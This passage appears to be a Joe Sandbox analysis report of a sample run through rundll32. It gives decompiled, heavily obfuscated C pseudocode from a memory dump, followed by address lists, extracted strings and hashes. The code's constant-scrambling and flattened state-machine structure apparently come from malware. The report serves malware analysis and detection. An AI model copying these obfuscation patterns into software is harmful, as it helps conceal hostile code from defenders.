				_v1048 = _v1048 ^ 0x00002ab8;
				_v1168 = 0xae1f;
				_v1168 = _v1168 << 0xd;
				_v1168 = _v1168 + 0xffff74f0;
				_v1168 = _v1168 << 4;
				_v1168 = _v1168 ^ 0x5c356a94;
				_v1208 = 0x359d;
				_v1208 = _v1208 | 0x5603fb4d;
				_v1208 = _v1208 ^ 0x93f65ffe;
				_v1208 = _v1208 + 0xffff2544;
				_v1208 = _v1208 ^ 0xc5f49583;
				_v1096 = 0x7882;
				_v1096 = _v1096 >> 0xf;
				_v1096 = _v1096 ^ 0x00002419;
				_v1056 = 0xcea3;
				_v1056 = _v1056 | 0x0e5b8076;
				_v1056 = _v1056 ^ 0x0e5bb652;
				_v1080 = 0x3155;
				_v1080 = _v1080 << 0xe;
				_v1080 = _v1080 ^ 0x0c55200b;
				_v1136 = 0xba36;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 + 0xffffe69b;
				_v1136 = _v1136 ^ 0xffffbbcd;
				_v1112 = 0x85c1;
				_v1112 = _v1112 >> 1;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 ^ 0x00041278;
				_v1232 = 0x2479;
				_v1232 = _v1232 + 0xcb0a;
				_t524 = 0x1f;
				_v1232 = _v1232 / _t524;
				_v1232 = _v1232 >> 4;
				_v1232 = _v1232 ^ 0x00007b29;
				_v1064 = 0xe02a;
				_v1064 = _v1064 ^ 0xc62293c8;
				_v1064 = _v1064 ^ 0xc62218e6;
				_v1068 = 0x44e;
				_v1068 = _v1068 | 0xb4aa3349;
				_v1068 = _v1068 ^ 0xb4aa2b2b;
				_v1076 = 0x9e01;
				_v1076 = _v1076 | 0xaa6898da;
				_v1076 = _v1076 ^ 0xaa68d402;
				_v1212 = 0x5c9b;
				_v1212 = _v1212 << 9;
				_v1212 = _v1212 + 0xffff9f0e;
				_v1212 = _v1212 << 0xc;
				_v1212 = _v1212 ^ 0x8d509c36;
				_v1116 = 0x1499;
				_v1116 = _v1116 << 6;
				_t525 = 0x2a;
				_v1116 = _v1116 / _t525;
				_v1116 = _v1116 ^ 0x00002ed9;
				_v1124 = 0xa5a;
				_t526 = 0x54;
				_v1124 = _v1124 * 0x75;
				_v1124 = _v1124 >> 9;
				_v1124 = _v1124 ^ 0x00002bb5;
				_v1220 = 0x42d6;
				_v1220 = _v1220 << 8;
				_v1220 = _v1220 + 0xffffc475;
				_v1220 = _v1220 | 0x5a28b5fc;
				_v1220 = _v1220 ^ 0x5a6ace7c;
				_v1132 = 0x1da4;
				_v1132 = _v1132 * 0x78;
				_v1132 = _v1132 | 0xeed517ac;
				_v1132 = _v1132 ^ 0xeedd9478;
				_v1084 = 0x3643;
				_v1084 = _v1084 ^ 0x7308e5d5;
				_v1084 = _v1084 ^ 0x7308c10b;
				_v1092 = 0x4e6;
				_v1092 = _v1092 ^ 0x5bad2aff;
				_v1092 = _v1092 ^ 0x5bad788f;
				_v1148 = 0xe1d8;
				_v1148 = _v1148 ^ 0x6292657d;
				_v1148 = _v1148 | 0x653adfa7;
				_v1148 = _v1148 ^ 0x67baa6af;
				_v1180 = 0x9ec4;
				_v1180 = _v1180 / _t526;
				_v1180 = _v1180 | 0xff8fffef;
				_v1180 = _v1180 ^ 0xff8f83ae;
				_v1188 = 0xe04c;
				_v1188 = _v1188 << 0xa;
				_v1188 = _v1188 + 0xc4a8;
				_v1188 = _v1188 ^ 0x4d3f4464;
				_v1188 = _v1188 ^ 0x4ebe98af;
				_v1100 = 0x76ef;
				_v1100 = _v1100 + 0xc8d0;
				_v1100 = _v1100 ^ 0x935e593d;
				_v1100 = _v1100 ^ 0x935f6b67;
				_v1160 = 0x131a;
				_v1160 = _v1160 + 0x8824;
				_v1160 = _v1160 + 0x4219;
				_v1160 = _v1160 ^ 0x392ff046;
				_v1160 = _v1160 ^ 0x392f03d1;
				_v1224 = 0xd716;
				_t527 = 0xa;
				_v1224 = _v1224 / _t527;
				_t528 = 0x74;
				_v1224 = _v1224 / _t528;
				_v1224 = _v1224 >> 0xf;
				_v1224 = _v1224 ^ 0x00002348;
				_v1192 = 0x454e;
				_v1192 = _v1192 + 0x4723;
				_v1192 = _v1192 | 0x7d53cea4;
				_v1192 = _v1192 + 0x2839;
				_v1192 = _v1192 ^ 0x7d53a8a1;
				_v1104 = 0x430c;
				_v1104 = _v1104 / _t528;
				_t529 = 0x5a;
				_v1104 = _v1104 * 0x36;
				_v1104 = _v1104 ^ 0x000056a7;
				_v1060 = 0xa641;
				_v1060 = _v1060 + 0xffff95bb;
				_v1060 = _v1060 ^ 0x0000311b;
				_v1156 = 0xd3b;
				_v1156 = _v1156 + 0x3800;
				_v1156 = _v1156 + 0xffff7466;
				_v1156 = _v1156 | 0xdb0d9699;
				_v1156 = _v1156 ^ 0xffffaa13;
				_v1164 = 0xd68f;
				_v1164 = _v1164 ^ 0x9f1ca777;
				_v1164 = _v1164 >> 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0x004fa0f1;
				_v1172 = 0x8e1a;
				_v1172 = _v1172 ^ 0xfd2450e4;
				_v1172 = _v1172 + 0x4fb;
				_v1172 = _v1172 + 0xffff8789;
				_v1172 = _v1172 ^ 0xfd247c32;
				_v1228 = 0xa048;
				_v1228 = _v1228 | 0x9ec1f950;
				_v1228 = _v1228 / _t529;
				_v1228 = _v1228 >> 0x10;
				_v1228 = _v1228 ^ 0x000f01fc;
				_v1196 = 0xaa8b;
				_v1196 = _v1196 << 0xd;
				_v1196 = _v1196 | 0x23cf0493;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x64930002;
				_v1108 = 0x6fa4;
				_v1108 = _v1108 + 0xffffd087;
				_v1108 = _v1108 << 0xf;
				_v1108 = _v1108 ^ 0x20158002;
				_v1204 = 0xbe7f;
				_v1204 = _v1204 ^ 0x05dd39e9;
				_t485 = _v1052;
				_t535 = _v1052;
				_t530 = _v1052;
				_v1204 = _v1204 / _t484;
				_v1204 = _v1204 ^ 0x000d2bdb;
				_v1140 = 0x81b1;
				_v1140 = _v1140 + 0xffff3d40;
				_v1140 = _v1140 * 0x71;
				_v1140 = _v1140 ^ 0xffe34871;
				while(1) {
					L1:
					_t467 = 0x5c;
					do {
						while(1) {
							L2:
							_t540 = _t486 - 0x19b4461d;
							if(_t540 > 0) {
								break;
							}
							if(_t540 == 0) {
								E002930A4(_t485, _v1060, _v1156, _v1164, _v1172);
							} else {
								if(_t486 == 0x169732f) {
									_t531 =  *0x2b0724; // 0x340cf0
									while(1) {
										__eflags =  *_t531 - _t467;
										if(__eflags == 0) {
											break;
										}
										_t531 = _t531 + 2;
										__eflags = _t531;
									}
									_t530 = _t531 + 2;
									_t486 = 0x378e2f54;
									continue;
								} else {
									if(_t486 == 0x66715dc) {
										_push(_t486);
										E002A29A0(_v1128, _v1176, _v1072,  &_v1040, _v1152, _t486, _v1200);
										_t536 =  &(_t536[8]);
										_t486 = 0x10a32bba;
										while(1) {
											L1:
											_t467 = 0x5c;
											goto L2;
										}
									} else {
										if(_t486 == 0x10a32bba) {
											_push(_v1216);
											_push(_v1184);
											_t476 = E00296ABA(_v1088, 0x2af820, __eflags);
											_t479 =  *0x2b0724; // 0x340cf0
											E0029EF2E(_t476, __eflags, _v1144, _v1048, _t479 + 0x238, _v1168, 0x104,  &_v520, _v1208,  &_v1040,  *0x2b0724, _v1096);
											E0029F935(_v1056, _t476, _v1080, _v1136);
											_t532 = _v1052;
											_t536 =  &(_t536[0xe]);
											_t486 = 0x169732f;
											while(1) {
												L1:
												_t467 = 0x5c;
												goto L2;
											}
										} else {
											if(_t486 != 0x169fd40b) {
												goto L24;
											} else {
												E002930A4(_t535, _v1160, _v1224, _v1192, _v1104);
												_t536 =  &(_t536[3]);
												L9:
												_t486 = 0x19b4461d;
												while(1) {
													L1:
													_t467 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _t532;
						}
						__eflags = _t486 - 0x1a7e72a2;
						if(_t486 == 0x1a7e72a2) {
							E002AA7E4(_v1180, _v1188, _t535, _v1100, _t485);
							_t536 =  &(_t536[3]);
							_t486 = 0x169fd40b;
							_t467 = 0x5c;
							goto L24;
						} else {
							__eflags = _t486 - 0x28ee42ec;
							if(_t486 == 0x28ee42ec) {
								_push(_v1148);
								_push(_v1092);
								_push(_t530);
								_push(_v1084);
								_push(_v1140);
								_push(_t486);
								_push(_v1132);
								_push( &_v520);
								_push(_v1220);
								_push(_v1124);
								_push(_v1116);
								_push(_v1212);
								_push(_v1076);
								_push(_t530);
								_push(_v1068);
								_push(_v1204);
								_push(_t486);
								_push(_v1108);
								_t470 = E002945C3(_v1196, _t485);
								_t535 = _t470;
								_t536 = _t536 - 0xc + 0x54;
								__eflags = _t470;
								if(__eflags == 0) {
									goto L9;
								} else {
									_t486 = 0x1a7e72a2;
									_t532 = 1;
									_v1052 = 1;
									goto L1;
								}
							} else {
								__eflags = _t486 - 0x378e2f54;
								if(_t486 != 0x378e2f54) {
									goto L24;
								} else {
									_t472 = E002A9EEB(_t486, _v1112, _v1228, _t486, _v1232, _v1064);
									_t485 = _t472;
									_t536 =  &(_t536[4]);
									__eflags = _t472;
									if(__eflags != 0) {
										_t486 = 0x28ee42ec;
										while(1) {
											L1:
											_t467 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t486 - 0x60970a6;
					} while (__eflags != 0);
					goto L27;
				}
			}

0x00294d5f
0x00294d65
0x00294d6f
0x00294d74
0x00294d79
0x00294d81
0x00294d86
0x00294d8e
0x00294da5
0x00294dac
0x00294dae
0x00294db9
0x00294dc7
0x00294dcc
0x00294dd2
0x00294dda
0x00294de2
0x00294dea
0x00294def
0x00294df7
0x00294dfc
0x00294e04
0x00294e0f
0x00294e1a
0x00294e25
0x00294e32
0x00294e33
0x00294e3a
0x00294e3e
0x00294e46
0x00294e4e
0x00294e59
0x00294e64
0x00294e6f
0x00294e77
0x00294e7c
0x00294e81
0x00294e89
0x00294e91
0x00294e99
0x00294ea1
0x00294ea9
0x00294eae
0x00294eb6
0x00294ec1
0x00294ec9
0x00294ed4
0x00294edf
0x00294eec
0x00294ef6
0x00294efa
0x00294f02
0x00294f0d
0x00294f15
0x00294f20
0x00294f28
0x00294f2d
0x00294f35
0x00294f3a
0x00294f42
0x00294f4a
0x00294f52
0x00294f5a
0x00294f62
0x00294f6a
0x00294f75
0x00294f7d
0x00294f88
0x00294f95
0x00294fa0
0x00294fab
0x00294fb6
0x00294fbe
0x00294fc9
0x00294fd1
0x00294fd6
0x00294fde
0x00294fe6
0x00294ff1
0x00294ff8
0x00295000
0x0029500b
0x00295013
0x00295021
0x00295026
0x0029502c
0x00295031
0x00295039
0x00295044
0x0029504f
0x0029505a
0x00295065
0x00295070
0x0029507b
0x00295086
0x00295091
0x0029509c
0x002950a4
0x002950a9
0x002950b1
0x002950b6
0x002950be
0x002950c9
0x002950d8
0x002950dd
0x002950e6
0x002950f1
0x00295104
0x00295105
0x00295109
0x0029510e
0x00295116
0x0029511e
0x00295123
0x0029512b
0x00295133
0x0029513b
0x00295148
0x0029514c
0x00295154
0x0029515c
0x00295167
0x00295172
0x0029517d
0x00295188
0x00295193
0x0029519e
0x002951a6
0x002951ae
0x002951b6
0x002951be
0x002951cc
0x002951d0
0x002951d8
0x002951e0
0x002951ea
0x002951ef
0x002951f7
0x002951ff
0x00295207
0x00295212
0x0029521d
0x00295228
0x00295233
0x0029523b
0x00295243
0x0029524b
0x00295253
0x0029525b
0x00295269
0x0029526e
0x00295278
0x0029527d
0x00295281
0x00295286
0x0029528e
0x00295296
0x0029529e
0x002952a6
0x002952ae
0x002952b6
0x002952cc
0x002952dd
0x002952de
0x002952e5
0x002952f0
0x002952fb
0x00295306
0x00295311
0x00295319
0x00295321
0x00295329
0x00295331
0x00295339
0x00295341
0x00295349
0x0029534e
0x00295353
0x0029535b
0x00295363
0x0029536b
0x00295373
0x0029537b
0x00295383
0x0029538b
0x00295399
0x0029539d
0x002953a2
0x002953aa
0x002953b2
0x002953b7
0x002953bf
0x002953c4
0x002953cc
0x002953d7
0x002953e2
0x002953ea
0x002953f5
0x002953fd
0x00295415
0x0029541c
0x00295423
0x0029542a
0x0029542e
0x00295436
0x0029543e
0x0029544b
0x0029544f
0x00295457
0x00295457
0x00295459
0x0029545a
0x0029545a
0x0029545a
0x0029545a
0x00295460
0x00000000
0x00000000
0x00295466
0x002956d3
0x0029546c
0x00295472
0x00295595
0x002955a0
0x002955a0
0x002955a3
0x00000000
0x00000000
0x0029559d
0x0029559d
0x0029559d
0x002955a5
0x002955a8
0x00000000
0x00295478
0x0029547e
0x00295558
0x00295583
0x00295588
0x0029558b
0x00295457
0x00295457
0x00295459
0x00000000
0x00295459
0x00295484
0x0029548a
0x002954bc
0x002954c5
0x002954d0
0x00295503
0x00295523
0x0029553f
0x00295544
0x0029554b
0x0029554e
0x00295457
0x00295457
0x00295459
0x00000000
0x00295459
0x0029548c
0x00295492
0x00000000
0x00295498
0x002954ad
0x002954b2
0x002954b5
0x002954b5
0x00295457
0x00295457
0x00295459
0x00000000
0x00295459
0x00295457
0x00295492
0x0029548a
0x0029547e
0x00295472
0x002956dc
0x002956e7
0x002956e7
0x002955b2
0x002955b8
0x002956a0
0x002956a5
0x002956a8
0x002956af
0x00000000
0x002955be
0x002955be
0x002955c4
0x00295605
0x00295612
0x00295619
0x0029561a
0x00295621
0x00295625
0x00295626
0x0029562d
0x00295631
0x00295635
0x0029563c
0x00295643
0x00295647
0x0029564e
0x0029564f
0x00295656
0x0029565a
0x0029565b
0x00295669
0x0029566e
0x00295670
0x00295673
0x00295675
0x00000000
0x0029567b
0x0029567d
0x00295682
0x00295683
0x00000000
0x00295683
0x002955c6
0x002955c6
0x002955cc
0x00000000
0x002955d2
0x002955e9
0x002955ee
0x002955f0
0x002955f3
0x002955f5
0x002955fb
0x00295457
0x00295457
0x00295459
0x00000000
0x00295459
0x00295457
0x002955f5
0x002955cc
0x002955c4
0x00000000
0x002956b0
0x002956b0
0x002956b0
0x00000000
0x002956bc

Strings

9(, xrefs: 002952A6
dD?M, xrefs: 002951F7
y$, xrefs: 0029500B
){, xrefs: 00295031
v, xrefs: 00295207
U1, xrefs: 00294FAB
H#, xrefs: 00295286
B(, xrefs: 002955FB
6ajK, xrefs: 00294E64
*, xrefs: 00295039
Z, xrefs: 002950F1
B(, xrefs: 002955BE
;, xrefs: 00295311
C6, xrefs: 0029515C
]L, xrefs: 00294EFA

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ){$*$6ajK$9($;$C6$H#$U1$Z$]L$dD?M$y$$B($B($v
API String ID: 1725840886-3756392671
Opcode ID: 358cd70ffa2cdbfd319bbb06c03f6747a4a35d68920ce63c780e712b5160c532
Instruction ID: 0442e2e1c87fea3400f1e6847ef3cbe3ee1defe10dacfc08a49a0765dc102fcb
Opcode Fuzzy Hash: 358cd70ffa2cdbfd319bbb06c03f6747a4a35d68920ce63c780e712b5160c532
Instruction Fuzzy Hash: D7222271508781CFE7A9CF21C84AA5BFBE1BBC4708F50891DE2DA86260C7B58959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A8E79, Relevance: 17.9, Strings: 14, Instructions: 385
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E002A8E79() {
				signed int _t409;
				signed int _t412;
				signed int _t421;
				signed int _t422;
				signed int _t426;
				signed int _t428;
				void* _t433;
				intOrPtr _t465;
				signed int _t469;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				void* _t480;
				signed int _t481;
				void* _t486;

				 *((intOrPtr*)(_t486 + 0xac)) = 0x23f27f;
				 *(_t486 + 0xb4) = 0;
				 *(_t486 + 0xb0) = 0x4c49a8;
				_t433 = 0x3177d3dd;
				 *(_t486 + 0x44) = 0x8d5d;
				 *(_t486 + 0x44) =  *(_t486 + 0x44) | 0x54fe633e;
				 *(_t486 + 0x44) =  *(_t486 + 0x44) + 0xcc2a;
				 *(_t486 + 0x44) =  *(_t486 + 0x44) ^ 0x54ffbba8;
				 *(_t486 + 8) = 0x9695;
				 *(_t486 + 8) =  *(_t486 + 8) << 5;
				 *(_t486 + 8) =  *(_t486 + 8) ^ 0x8d96acf8;
				 *(_t486 + 0xa8) = 0;
				 *(_t486 + 0x18) =  *(_t486 + 8) * 0x61;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) ^ 0x9f33df59;
				 *(_t486 + 0x64) = 0xa02c;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) ^ 0xf1fe72f6;
				_t472 = 0x27;
				 *(_t486 + 0x68) =  *(_t486 + 0x64) / _t472;
				 *(_t486 + 0x68) =  *(_t486 + 0x68) ^ 0x063437d1;
				 *(_t486 + 0xa8) = 0x83bb;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) >> 6;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) ^ 0x00001a7c;
				 *(_t486 + 0x38) = 0x5e06;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) ^ 0xfc89bfa1;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) ^ 0xc41a8841;
				_t473 = 0x38;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) * 0x28;
				 *(_t486 + 0x38) =  *(_t486 + 0x38) ^ 0xd708a467;
				 *(_t486 + 0x88) = 0x654;
				 *(_t486 + 0x88) =  *(_t486 + 0x88) | 0x696c0764;
				 *(_t486 + 0x88) =  *(_t486 + 0x88) ^ 0x696c20fc;
				 *(_t486 + 0xb4) = 0x6aa9;
				 *(_t486 + 0xb4) =  *(_t486 + 0xb4) / _t473;
				 *(_t486 + 0xb4) =  *(_t486 + 0xb4) ^ 0x000065d1;
				 *(_t486 + 0xa4) = 0x734e;
				 *(_t486 + 0xa4) =  *(_t486 + 0xa4) | 0xc307be4d;
				 *(_t486 + 0xa4) =  *(_t486 + 0xa4) ^ 0xc307b1a5;
				 *(_t486 + 0x3c) = 0x801b;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0x7f35;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xffff8eed;
				_t474 = 9;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) * 0x3e;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) ^ 0x00221218;
				 *(_t486 + 0x34) = 0xeaa9;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) / _t474;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) ^ 0x97c23ca8;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) << 9;
				 *(_t486 + 0x34) =  *(_t486 + 0x34) ^ 0x844d562b;
				 *(_t486 + 0x70) = 0x8a22;
				 *(_t486 + 0x70) =  *(_t486 + 0x70) + 0xffff2723;
				 *(_t486 + 0x70) =  *(_t486 + 0x70) + 0xffffd0b5;
				 *(_t486 + 0x70) =  *(_t486 + 0x70) ^ 0xffffd6fd;
				 *(_t486 + 0x98) = 0xa26a;
				_t475 = 0x37;
				 *(_t486 + 0x94) =  *(_t486 + 0x98) / _t475;
				 *(_t486 + 0x94) =  *(_t486 + 0x94) ^ 0x000047e8;
				 *(_t486 + 0x8c) = 0x5306;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) | 0x53a728d9;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) ^ 0x53a730b7;
				 *(_t486 + 0x20) = 0x472a;
				 *(_t486 + 0x20) =  *(_t486 + 0x20) | 0x8706d4c5;
				 *(_t486 + 0x20) =  *(_t486 + 0x20) + 0xfffff895;
				_t476 = 0x29;
				 *(_t486 + 0x24) =  *(_t486 + 0x20) / _t476;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0x034b11a0;
				 *(_t486 + 0x14) = 0x5214;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) ^ 0x4eb7f7f7;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) << 0x10;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) >> 9;
				 *(_t486 + 0x14) =  *(_t486 + 0x14) ^ 0x0052c7ca;
				 *(_t486 + 0x48) = 0xbe8a;
				 *(_t486 + 0x48) =  *(_t486 + 0x48) | 0x6ea11e17;
				 *(_t486 + 0x48) =  *(_t486 + 0x48) ^ 0x5332d59f;
				 *(_t486 + 0x48) =  *(_t486 + 0x48) ^ 0x3d931311;
				 *(_t486 + 0x50) = 0x8957;
				 *(_t486 + 0x50) =  *(_t486 + 0x50) << 9;
				 *(_t486 + 0x50) =  *(_t486 + 0x50) >> 5;
				 *(_t486 + 0x50) =  *(_t486 + 0x50) ^ 0x0008d070;
				 *(_t486 + 0x4c) = 0xbd25;
				 *(_t486 + 0x4c) =  *(_t486 + 0x4c) + 0xfffffb1f;
				 *(_t486 + 0x4c) =  *(_t486 + 0x4c) ^ 0x10b236cf;
				 *(_t486 + 0x4c) =  *(_t486 + 0x4c) ^ 0x10b2cc6c;
				 *(_t486 + 0x64) = 0x2b80;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) + 0x427c;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) | 0xe54eb77f;
				 *(_t486 + 0x64) =  *(_t486 + 0x64) ^ 0xe54ecb58;
				 *(_t486 + 0x94) = 0xa1a1;
				_t477 = 0x1b;
				 *(_t486 + 0x94) =  *(_t486 + 0x94) * 0x21;
				 *(_t486 + 0x94) =  *(_t486 + 0x94) ^ 0x0014b5fe;
				 *(_t486 + 0xb0) = 0xd1e2;
				 *(_t486 + 0xb0) =  *(_t486 + 0xb0) + 0xffff8f58;
				 *(_t486 + 0xb0) =  *(_t486 + 0xb0) ^ 0x0000462a;
				 *(_t486 + 0x30) = 0xbd5e;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) + 0xe804;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) | 0x865be769;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) << 6;
				 *(_t486 + 0x30) =  *(_t486 + 0x30) ^ 0x96f9c809;
				 *(_t486 + 0x54) = 0x4c01;
				 *(_t486 + 0x54) =  *(_t486 + 0x54) | 0x8122e6e8;
				 *(_t486 + 0x54) =  *(_t486 + 0x54) >> 0xb;
				 *(_t486 + 0x54) =  *(_t486 + 0x54) ^ 0x001039f9;
				 *(_t486 + 0x74) = 0x7e82;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) + 0xffffb8bd;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) * 0x56;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) ^ 0x0012c48e;
				 *(_t486 + 0x84) = 0x5368;
				 *(_t486 + 0x84) =  *(_t486 + 0x84) + 0xffffd43f;
				 *(_t486 + 0x84) =  *(_t486 + 0x84) ^ 0x0000575d;
				 *(_t486 + 0x8c) = 0xbbf0;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) | 0x7588fbe3;
				 *(_t486 + 0x8c) =  *(_t486 + 0x8c) ^ 0x7588e5f2;
				 *(_t486 + 0x18) = 0xbb5c;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) >> 0xf;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) / _t477;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) << 6;
				 *(_t486 + 0x18) =  *(_t486 + 0x18) ^ 0x000008e5;
				 *(_t486 + 0x7c) = 0x27e3;
				_t478 = 0x16;
				 *(_t486 + 0x78) =  *(_t486 + 0x7c) / _t478;
				 *(_t486 + 0x78) =  *(_t486 + 0x78) << 0xd;
				 *(_t486 + 0x78) =  *(_t486 + 0x78) ^ 0x003a76d8;
				 *(_t486 + 0x58) = 0x289e;
				 *(_t486 + 0x58) =  *(_t486 + 0x58) << 4;
				 *(_t486 + 0x58) =  *(_t486 + 0x58) + 0xffff4ae2;
				 *(_t486 + 0x58) =  *(_t486 + 0x58) ^ 0x0001f5bb;
				 *(_t486 + 0x68) = 0xc0ee;
				_t479 = 0x28;
				_t431 =  *(_t486 + 0xb4);
				_t469 =  *(_t486 + 0xb4);
				 *(_t486 + 0x68) =  *(_t486 + 0x68) * 0x36;
				 *(_t486 + 0x68) =  *(_t486 + 0x68) + 0xfffff104;
				 *(_t486 + 0x68) =  *(_t486 + 0x68) ^ 0x0028ad02;
				 *(_t486 + 0x24) = 0x6618;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0x4c258e12;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) + 0xffff62b3;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0xeb87d2b6;
				 *(_t486 + 0x24) =  *(_t486 + 0x24) ^ 0xa7a2cea3;
				 *(_t486 + 0x3c) = 0x531e;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xffff0da0;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xffffbba6;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) + 0xfe91;
				 *(_t486 + 0x3c) =  *(_t486 + 0x3c) ^ 0x0000637b;
				 *(_t486 + 0xa8) = 0x581d;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) ^ 0xccef8aaa;
				 *(_t486 + 0xa8) =  *(_t486 + 0xa8) ^ 0xccef8ba4;
				 *(_t486 + 0x1c) = 0x42fd;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) + 0xffffdb0a;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) + 0xffffa659;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) | 0xf6ae1509;
				 *(_t486 + 0x1c) =  *(_t486 + 0x1c) ^ 0xffff989b;
				 *(_t486 + 0x98) = 0xced7;
				 *(_t486 + 0x98) =  *(_t486 + 0x98) >> 2;
				 *(_t486 + 0x98) =  *(_t486 + 0x98) ^ 0x00007c3c;
				 *(_t486 + 0x5c) = 0x28f8;
				_t484 =  *(_t486 + 0xb4);
				 *(_t486 + 0x5c) =  *(_t486 + 0x5c) * 0x14;
				 *(_t486 + 0x5c) =  *(_t486 + 0x5c) | 0x45551963;
				 *(_t486 + 0x5c) =  *(_t486 + 0x5c) ^ 0x45574e02;
				 *(_t486 + 0x40) = 0x776f;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) + 0xffffe204;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) << 0xb;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) + 0xffff640e;
				 *(_t486 + 0x40) =  *(_t486 + 0x40) ^ 0x02caf0c2;
				 *(_t486 + 0x7c) = 0x1fa6;
				 *(_t486 + 0x7c) =  *(_t486 + 0x7c) + 0xf883;
				 *(_t486 + 0x7c) =  *(_t486 + 0x7c) + 0xffff7a6f;
				 *(_t486 + 0x7c) =  *(_t486 + 0x7c) ^ 0x0000fcf5;
				 *(_t486 + 0x9c) = 0x9499;
				 *(_t486 + 0x9c) =  *(_t486 + 0x9c) << 0xf;
				 *(_t486 + 0x9c) =  *(_t486 + 0x9c) ^ 0x4a4c8ff3;
				 *(_t486 + 0x74) = 0x5d89;
				_t480 = 0x216d57e9;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) / _t479;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) << 0xe;
				 *(_t486 + 0x74) =  *(_t486 + 0x74) ^ 0x0095c9c8;
				 *(_t486 + 0x28) = 0x444e;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) | 0xf2adfff0;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) << 2;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) * 0x36;
				 *(_t486 + 0x28) =  *(_t486 + 0x28) ^ 0xc2cffe53;
				L1:
				while(_t433 != 0x6d42f45) {
					if(_t433 == 0x71db371) {
						E0029DD94( *(_t486 + 0x70), _t486 + 0xd0, __eflags, _t433,  *(_t486 + 0xa8),  *(_t486 + 0x34));
						_t412 = E002A2089( *(_t486 + 0x98),  *((intOrPtr*)(_t486 + 0xc4)),  *(_t486 + 0xb0), _t486 + 0xd8);
						_t484 = _t412;
						_t486 = _t486 + 0x14;
						_t433 = 0x6d42f45;
						 *((short*)(_t412 - 2)) = 0;
						continue;
					}
					if(_t433 == 0xec93344) {
						E0029EF80( *(_t486 + 0x9c), _t469,  *(_t486 + 0x5c));
						_t433 = 0x21769d07;
						continue;
					}
					if(_t433 == 0x197f34ec) {
						_push(_t433);
						_push(_t433);
						 *((intOrPtr*)(_t486 + 0xc0)) = 0x1000;
						_t469 = E002A9E2B(0x1000);
						_t486 = _t486 + 0xc;
						__eflags = _t469;
						_t433 =  !=  ? _t480 : 0x21769d07;
						continue;
					}
					if(_t433 == _t480) {
						_t421 = E002A67D2( *((intOrPtr*)(_t486 + 0xc8)),  *((intOrPtr*)(_t486 + 0xe0)),  *(_t486 + 0x5c), _t431,  *((intOrPtr*)(_t486 + 0xdc)), _t433,  *(_t486 + 0x70), _t486 + 0xd0,  *(_t486 + 0x88),  *(_t486 + 0x68),  *((intOrPtr*)(_t486 + 0x90)),  *(_t486 + 0x94), _t433,  *(_t486 + 0x18), _t469);
						_t486 = _t486 + 0x38;
						__eflags = _t421;
						if(_t421 == 0) {
							_t422 =  *(_t486 + 0xb8);
							L19:
							__eflags = _t422;
							if(__eflags == 0) {
								_t433 = _t480;
							} else {
								_t465 =  *0x2b0714; // 0x0
